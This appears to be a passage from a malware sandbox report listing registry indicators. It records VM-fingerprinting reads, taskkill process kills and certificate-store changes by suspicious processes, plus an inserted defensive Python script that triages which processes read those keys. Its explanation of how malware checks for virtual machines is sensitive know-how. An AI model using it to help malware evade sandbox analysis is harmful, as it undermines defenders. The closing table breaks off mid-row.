Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
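The three preceding signatures (SCSI device keys, CentralProcessor, and the BIOS/System identifiers) are the standard registry sources for VM fingerprinting, and the useful question for an analyst is not that they were read but by whom, and whether the values on this particular machine would actually have given the game away. The Python below is an added triage example written for this page, not code from the sandbox or from any of the samples. It parses rows in the flattened "<description> <ioc> <process>" form this report uses, records which process read which identifier, flags readers outside an assumed allow-list (svchost.exe and DrvInst.exe, the PnP and driver-install components that legitimately walk the SCSI enumeration tree here), and checks whether the logged vendor/product strings contain any of the hypervisor markers such checks commonly look for (the marker list is an assumption; a given family may test a different set). The eight sample rows are copied from the SCSI, processor and system-info tables of this report.

```python
import re

# Eight rows copied from this report's "Checks SCSI registry key(s)",
# "Checks processor information in registry" and "Enumerates system info in
# registry" tables, in the flattened "<description> <ioc> <process>" form the
# page uses.  Constructed sample input for the functions below.
SAMPLE_ROWS = r"""
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID taskkill.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs jfiag3g_gg.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6762a766.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RunWW.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe
"""
SAMPLE_LINES = [l for l in SAMPLE_ROWS.splitlines() if l.strip()]

# One row of the flattened table: description, registry path, process name.
# Paths in these three tables contain no spaces, so the last token is the process.
ROW_RE = re.compile(
    r"^(Key opened|Key value queried|Key queried|Key created)\s+(\\REGISTRY\\\S+)\s+(\S+)$"
)

# Strings that VM-detection routines commonly look for in device identifiers.
# Assumed list: any particular family may check a different set.
VM_MARKERS = ("VBOX", "VMWARE", "QEMU", "VIRTUAL", "XEN", "INNOTEK", "BOCHS", "PARALLELS")

# Windows components that legitimately walk the SCSI enumeration tree in this
# report (PnP manager, driver installer).  Assumed allow-list; tune it to your baseline.
EXPECTED_READERS = frozenset({"svchost.exe", "DrvInst.exe"})


def parse_row(line):
    """Return (description, ioc, process) or None for a line that is not a row."""
    m = ROW_RE.match(line.strip())
    return m.groups() if m else None


def classify(ioc):
    """Map a registry path to the fingerprinting check it serves.

    Returns ("scsi", <device instance id or "*">), ("cpu", <leaf>),
    ("sysinfo", <leaf>) or None.  "*" means the SCSI enumeration root itself
    was opened, i.e. the process enumerated every attached SCSI device.
    """
    parts = ioc.split("\\")
    upper = [p.upper() for p in parts]
    if "ENUM" in upper and "SCSI" in upper:
        i = upper.index("SCSI")
        return "scsi", (parts[i + 1] if len(parts) > i + 1 else "*")
    if "CENTRALPROCESSOR" in upper:
        return "cpu", parts[-1]
    if "DESCRIPTION" in upper and "SYSTEM" in upper:  # BIOS\*, System\Identifier
        return "sysinfo", parts[-1]
    return None


def device_strings(device_id):
    """Vendor/product tokens of an instance id such as 'CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM'."""
    return [t for t in device_id.split("&") if t.upper().startswith(("VEN_", "PROD_"))]


def vm_markers_in(text):
    """Hypervisor marker strings present in text (case-insensitive), in VM_MARKERS order."""
    up = text.upper()
    return [m for m in VM_MARKERS if m in up]


def triage(lines, expected=EXPECTED_READERS):
    """Group fingerprinting reads by process; flag processes outside the allow-list."""
    result = {}
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        desc, ioc, proc = row
        hit = classify(ioc)
        if hit is None:
            continue
        cat, detail = hit
        entry = result.setdefault(
            proc, {"checks": set(), "devices": set(), "values": set(), "flag": proc not in expected}
        )
        entry["checks"].add(cat)
        if cat == "scsi":
            entry["devices"].update(device_strings(detail) if detail != "*" else ["*"])
        if desc == "Key value queried":
            entry["values"].add(ioc.rsplit("\\", 1)[-1])
    return result


def flagged_processes(lines):
    """Sorted names of non-allow-listed processes that performed any of the checks."""
    return sorted(p for p, e in triage(lines).items() if e["flag"])


def visible_vm_markers(lines):
    """Which VM_MARKERS a substring check would actually find in the logged device ids."""
    found = set()
    for line in lines:
        row = parse_row(line)
        hit = classify(row[1]) if row else None
        if hit and hit[0] == "scsi" and hit[1] != "*":
            for token in device_strings(hit[1]):
                found.update(vm_markers_in(token))
    return found


if __name__ == "__main__":
    for proc, e in sorted(triage(SAMPLE_LINES).items()):
        mark = "SUSPECT" if e["flag"] else "expected"
        print(f"{proc:16} {mark:8} checks={sorted(e['checks'])} "
              f"devices={sorted(e['devices'])} values={sorted(e['values'])}")
    print("hypervisor markers visible to the malware:", visible_vm_markers(SAMPLE_LINES) or "none")
```

For this report the last line prints none: the disk and DVD identifiers (Ven_ with an empty vendor, Prod_HeartDisk, Ven_Sanu, Prod_Sanu_DVD-ROM) carry no VBOX, VMware or QEMU substring, so a plain marker check would have passed, which is exactly why a sandbox exposes innocuous device names. The processes worth a second look are the flagged ones: 6762a766.exe opening the whole SCSI enumeration tree, the unsigned-looking droppers reading ProcessorNameString and SystemManufacturer, and taskkill.exe, a stock Windows utility, reading a disk HardwareID.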
Kills process with taskkill 14 IoCs
pid | Process
10424 | taskkill.exe
5588 | taskkill.exe
1116 | taskkill.exe
10688 | taskkill.exe
7360 | taskkill.exe
5232 | taskkill.exe
8068 | taskkill.exe
5628 | taskkill.exe
9736 | taskkill.exe
4040 | taskkill.exe
2356 | taskkill.exe
9312 | taskkill.exe
5524 | taskkill.exe
4804 | taskkill.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | 6762a766.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\PegasPc | file.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" | mask_svc.exe
Set value (str) | \RE­GISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | app.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | app.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
Modifies registry class 64 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\stripe.network\Total = "14" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | Process not Found
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\Total = "303" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "567" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\m.stripe.network\ = "0" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | Process not Found
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | Process not Found
Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\5\MRUListEx = ffffffff | Process not Found
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7f745661612dd701 | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\Total = "329" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff | Process not Found
Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | Process not Found
Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\2\MRUListEx = ffffffff | Process not Found
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\volume.com\NumberOfSubdoma = "0" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "395" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell | Process not Found
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" | Process not Found
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\ = "162" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\ = "303" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | Process not Found
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | Process not Found
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\NumberOfSubdoma = "1" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "75" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\volume.com\ = "278" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | Process not Found
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet
Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.propapps.info\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "143" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet 